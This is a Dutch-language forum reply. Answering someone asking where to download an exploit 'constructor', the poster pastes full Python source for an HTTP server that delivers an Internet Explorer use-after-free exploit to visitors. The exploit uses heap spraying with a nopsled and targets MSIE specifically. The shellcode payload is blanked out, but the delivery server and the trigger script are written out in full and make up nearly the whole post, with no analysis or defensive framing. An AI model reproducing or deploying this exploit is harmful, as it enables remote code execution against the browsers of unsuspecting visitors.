Door Anoniem: en waar kun je deze Exploit Constructur downloaden zodat ik meer te weten kan komen betreft de werking van de Exploit
Volgens mij wil jij helemaal niet weten hoe die exploit werkt maar die gewoon misbruiken ..... 
zo niet ... dan heb je aan de onderstaande informatie meer als de n00b constructor pack (waarschijnlijk is dat pack ook gewoon voorzien van een trojan) en sorry voor het onstaande abracadabra voor de mensen die het niet snappen
import sys  
import socket  
from BaseHTTPServer import HTTPServer, BaseHTTPRequestHandler  
class RequestHandler(BaseHTTPRequestHandler):  
    def convert_to_utf16(self, payload):  
        enc_payload = ''  
        for i in range(0, len(payload), 2):  
            num = 0 
            for j in range(0, 2):  
                num += (ord(payload[i + j]) & 0xff) << (j * 8)  
            enc_payload += '%%u%04x' % num  
        return enc_payload  
    def get_payload(self):  
        payload  = REMOVED
        return self.convert_to_utf16(payload)  
    def get_exploit(self):  
        exploit = '''  
        <html>  
        <head>  
            <script>  
            var obj, event_obj;  
            function spray_heap()  
            {  
                var chunk_size, payload, nopsled;  
                chunk_size = 0x80000;  
                payload = unescape("<PAYLOAD>");  
                nopsled = unescape("<NOP>");  
                while (nopsled.length < chunk_size)  
                    nopsled += nopsled;  
                nopsled_len = chunk_size - (payload.length + 20);          
                nopsled = nopsled.substring(0, nopsled_len);  
                heap_chunks = new Array();  
                for (var i = 0 ; i < 200 ; i++)  
                    heap_chunks = nopsled + payload;  
            }  
            function initialize()  
           {  
               obj = new Array();  
                event_obj = null;  
              for (var i = 0; i < 200 ; i++ )  
                   obj = document.createElement("COMMENT");  
            } 
            function ev1(evt)  
            {  
                event_obj = document.createEventObject(evt);  
                document.getElementById("sp1").innerHTML = "";  
                window.setInterval(ev2, 1);  
            }  
         
            function ev2()  
            {  
                var data, tmp;  
                   
                data = "";  
                tmp = unescape("%u0a0a%u0a0a");  
                for (var i = 0 ; i < 4 ; i++)  
                    data += tmp;  
                for (i = 0 ; i < obj.length ; i++ ) {  
                    obj.data = data;  
                }  
                event_obj.srcElement;  
            }  
                       
            function check()  
            {  
                if (navigator.userAgent.indexOf("MSIE") == -1)  
                    return false;  
                return true;     
            }  
               
            if (check()) {  
                initialize();  
                spray_heap();                 
            }  
            else  
                window.location = 'about:blank'  
                   
            </script>  
        </head>  
        <body>  
            <span id="sp1">  
            <img src="aurora.gif" onload="ev1(event)">  
            </span>          
        </body>  
        </html>  
        ''' 
        exploit = exploit.replace('<PAYLOAD>', self.get_payload())  
        exploit = exploit.replace('<NOP>', '%u0a0a%u0a0a')  
        return exploit   
   
    def get_image(self):  
        content  = REMOVED
        return content  
   
    def log_request(self, *args, **kwargs):  
        pass 
           
    def do_GET(self):  
        try:  
            if self.path == '/':  
                print 
                print '[-] Incoming connection from %s' % self.client_address[0]  
                self.send_response(200)   
                self.send_header('Content-Type', 'text/html')  
                self.end_headers()  
                print '[-] Sending exploit to %s ...' % self.client_address[0]  
                self.wfile.write(self.get_exploit())  
                print '[-] Exploit sent to %s' % self.client_address[0]  
            elif self.path == '/aurora.gif':        
                self.send_response(200)  
                self.send_header('Content-Type', 'image/gif')  
                self.end_headers()  
                self.wfile.write(self.get_image())  
        except:   
            print '[*] Error : an error has occured while serving the HTTP request' 
            print '[-] Exiting ...' 
            sys.exit(-1)  
def main():  
    if len(sys.argv) != 2:  
        print 'Usage: %s [port number (between 1024 and 65535)]' % sys.argv[0]  
        sys.exit(0)  
    try:  
        port = int(sys.argv[1])  
        if port < 1024 or port > 65535:  
            raise ValueError  
        try:  
            serv = HTTPServer(('', port), RequestHandler)  
            ip = socket.gethostbyname(socket.gethostname())  
            print '[-] Web server is running at http://%s:%d/' % (ip, port)  
            try:  
                serv.serve_forever()  
            except:  
                print '[-] Exiting ...'  
        except socket.error:  
            print '[*] Error : a socket error has occurred' 
        sys.exit(-1)      
    except ValueError:  
        print '[*] Error : an invalid port number was given' 
        sys.exit(-1)  
if __name__ == '__main__':  
    main() 
[/quote]